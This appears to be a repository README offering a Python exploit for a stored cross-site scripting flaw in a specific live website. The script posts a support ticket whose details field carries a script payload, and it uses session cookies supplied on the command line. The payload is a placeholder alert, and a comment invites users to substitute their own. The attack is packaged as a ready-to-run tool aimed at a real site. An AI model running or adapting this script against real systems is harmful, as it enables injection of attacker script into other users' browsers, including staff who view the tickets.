AnonStress Stored XSS Exploit
An exploit and demonstration on how to exploit a Stored XSS vulnerability in https://anonstress.com.
Details
| Vulnerability | Severity | Description |
|---|---|---|
| Stored XSS | 5.0/10 | This vulnerability allows attackers to execute arbitrary javascript code on a victims browser. |
Exploit
import sys
import requests
# https://anonstress.com Stored XSS Exploit
# Date: 09/25/21
# Author: Tactical
class Exploit:
def __init__(self, sesion_cookie, other_cookie):
self.sesion_cookie = sesion_cookie
self.other_cookie = other_cookie
self.title_name = "testone" # The name for the ticket | Note: You can change this.
self.xss_payload = "<script>alert(1)</script>" # Edit your own payload here if you would like.
def run(self):
site_cookies = {
"31k001c": self.other_cookie,
"fc_session": self.sesion_cookie
}
payload = {
"n3k0t": self.other_cookie,
"title": self.title_name,
"status": "1",
"details": self.xss_payload
}
s = requests.Session()
s.post("https://anonstress.com/support/ticket/create", cookies=site_cookies, data=payload)
def main() -> None:
if len(sys.argv) < 3:
print("Usage: python3 exploit.py <fc_session_cookie> <31k001c_cookie>")
sys.exit()
sesion_cookie = sys.argv[1]
other_cookie = sys.argv[2]
Exploit(sesion_cookie, other_cookie).run()
if __name__ == "__main__":
main()
Video & Demonstration by pin
https://user-images.githubusercontent.com/86132648/134786149-3f44568c-3fd3-442f-86bb-dd552cdfd1c8.mp4
1 Jan 02, 2022
2 Nov 30, 2021
7 Jul 14, 2022
16 Sep 06, 2022
266 Jan 02, 2023
117 Nov 28, 2022
164 Dec 10, 2022
3 Jan 08, 2022
1 Dec 09, 2021
622 Jan 04, 2023
4 Jan 27, 2022
25 Dec 04, 2022
48 Nov 26, 2022
21 Dec 27, 2022
135 Dec 14, 2022
36 Dec 20, 2022
14 Sep 30, 2022
1 Nov 15, 2021
6 Dec 08, 2022
3 Jul 03, 2022